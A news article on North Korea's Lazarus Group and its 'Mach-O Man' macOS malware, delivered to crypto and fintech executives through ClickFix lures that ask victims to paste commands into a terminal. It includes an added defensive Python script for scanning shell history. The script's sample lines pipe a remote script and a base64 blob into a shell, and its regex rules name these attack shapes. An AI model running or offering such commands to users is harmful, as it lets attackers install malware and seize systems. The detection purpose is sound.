Lazarus Group, which has recently drawn close attention from those who follow the crypto world, is bringing the large-scale cyber attacks once associated with the banking sector to the finance and digital money markets. The group, known to operate in conjunction with the North Korean government, stands out with a total of $6.7 billion in accumulated thefts since 2017. According to recent analysis, Lazarus has targeted executives and companies in the fintech and cryptocurrency sectors with a new attack method called Mach-O Man.
Mach-O Man and targeted sectors
Natalie Newson, a blockchain security researcher at CertiK, closely examines Lazarus Group’s activities in the crypto and fintech space. Over the last two weeks, the group has managed to drain a total of more than $500 million in digital assets from the Drift and KelpDAO platforms. The analysis emphasized that the attack wave called Mach-O Man is not a random cyber threat but an operation carried out by the North Korean state and planned on an institutional scale.
This new attack method targets institutions and senior executives, especially those operating in the crypto and finance fields. North Korea is considered to have turned cryptocurrency theft into a systematic state revenue model. Experts point out that Mach-O Man is used, in different variations, not only by Lazarus but also by other criminal organizations.
Attack method: ClickFix and social engineering tactics
The most striking feature of the Mach-O Man attack is that it is modular macOS malware. Developed by a Lazarus subunit called ‘Chollima’, it targets crypto- and fintech-oriented applications running on Apple’s operating system. Newson states that Mach-O Man was distributed through a social engineering technique called ‘ClickFix’.
In this method, attackers send urgent meeting invitations to administrators via Telegram. A link that appears to belong to a familiar platform such as Zoom, Microsoft Teams or Google Meet then redirects victims to a fake website. Victims are told that there is a connection problem and that they need to paste a specific command into the terminal to fix it. In reality, this command gives attackers direct access to corporate systems and financial resources.
“The page looks real, the instructions are ordinary, and the victims themselves initiate the action, which causes classic security measures to often fail to detect the attack,” Newson said.
New threats to DeFi projects
The Mach-O Man malware developed by Lazarus causes serious harm at both the institutional and individual levels, and DeFi projects in particular are under threat. According to information provided by security threat researcher Vladimir S., attackers took over the domain names of some decentralized finance projects, replaced the websites with fake Cloudflare alerts and asked visitors to run commands.
In these attacks, malicious commands are generally executed under the guise of an “authentication step”. Because the instructions seem realistic, most users or administrators follow them without question, giving the attackers full access to the platform’s systems. The malware then deletes itself within a short time and disappears without leaving a trace.
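The ClickFix lure described above, and the fake “authentication step” on hijacked DeFi sites, both end with a person pasting a command into a terminal. One thing a defender can do after the fact is review shell history on the affected Macs for the command shapes such lures rely on. The following Python script is an added example written for this article, not code from CertiK, the researchers quoted, or any of the projects named; the sample history lines, the `.invalid` domain, the rule names and the regular expressions are all constructed assumptions for illustration.

```python
import re
from dataclasses import dataclass
from typing import Iterable

# Constructed sample shell-history lines for this example (not taken from the
# article). Lines 1-3 resemble the "paste this into your terminal to fix the
# connection" pattern; lines 4-5 are ordinary administrator activity. The
# base64 blob on line 2 decodes to "echo hello" and the domain is a reserved
# .invalid name, so nothing here is a real payload or a real host.
SAMPLE_HISTORY = [
    ": 1700000000:0;curl -fsSL https://meeting-fix.example.invalid/repair.sh | bash",
    ": 1700000010:0;echo ZWNobyBoZWxsbw== | base64 -d | sh",
    ": 1700000020:0;osascript -e 'do shell script \"/tmp/.update\" with administrator privileges'",
    ": 1700000030:0;brew update && brew upgrade",
    ": 1700000040:0;git pull origin main",
]

# zsh EXTENDED_HISTORY writes ': <timestamp>:<duration>;<command>' per line.
ZSH_EXTENDED_PREFIX = re.compile(r"^:\s*\d+:\d+;")


@dataclass(frozen=True)
class Rule:
    name: str
    pattern: re.Pattern
    reason: str


# Detection rules (assumed for this example): each describes a command shape
# that a genuine "fix your meeting connection" instruction should never need.
RULES = [
    Rule("remote-script-to-shell",
         re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(ba|z)?sh\b"),
         "downloads a script and pipes it straight into a shell"),
    Rule("base64-decode-to-shell",
         re.compile(r"\bbase64\s+(-d|--decode|-D)\b.*\|\s*(sudo\s+)?(ba|z)?sh\b"),
         "decodes an encoded blob and executes it, hiding the real command"),
    Rule("osascript-admin-privileges",
         re.compile(r"\bosascript\b.*with administrator privileges"),
         "AppleScript that prompts the user for an administrator password"),
    Rule("quarantine-attribute-removed",
         re.compile(r"\bxattr\b.*\bcom\.apple\.quarantine\b"),
         "strips the Gatekeeper quarantine flag from a downloaded file"),
]


def normalize(line: str) -> str:
    """Strip the zsh extended-history prefix so the rules see only the command."""
    return ZSH_EXTENDED_PREFIX.sub("", line).strip()


def scan_history(lines: Iterable[str]) -> list[tuple[int, str]]:
    """Return (line number, rule name) for every history line that matches a rule."""
    findings = []
    for lineno, raw in enumerate(lines, start=1):
        cmd = normalize(raw)
        for rule in RULES:
            if rule.pattern.search(cmd):
                findings.append((lineno, rule.name))
    return findings


def report(lines: Iterable[str]) -> list[str]:
    """Human-readable findings, one string per match, for an analyst to triage."""
    lines = list(lines)
    by_name = {r.name: r for r in RULES}
    return [
        f"line {n}: {name} - {by_name[name].reason}: {normalize(lines[n - 1])}"
        for n, name in scan_history(lines)
    ]


if __name__ == "__main__":
    # On a real machine you would read ~/.zsh_history or ~/.bash_history instead.
    for entry in report(SAMPLE_HISTORY):
        print(entry)
```

The rules deliberately match command shapes rather than any specific domain or file name, because the article notes the malware removes itself and that variants differ between groups; the history line, unlike the binary, usually survives. A clean scan is not proof of absence (history can be disabled or edited), so treat a hit as a reason to image the host, not the only signal to rely on.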
“Most victims are not even aware that they have been attacked. Even if they realize it at the time, it is almost impossible to detect which attack variant has infiltrated their systems,” Newson said.
According to experts, Lazarus’ attacks have recently become more than a news headline: they are now a source of constant, high-risk threats to the crypto ecosystem. Those operating in the fintech and digital money sectors are advised to be extra careful against both technical and social engineering-based attacks in this new period.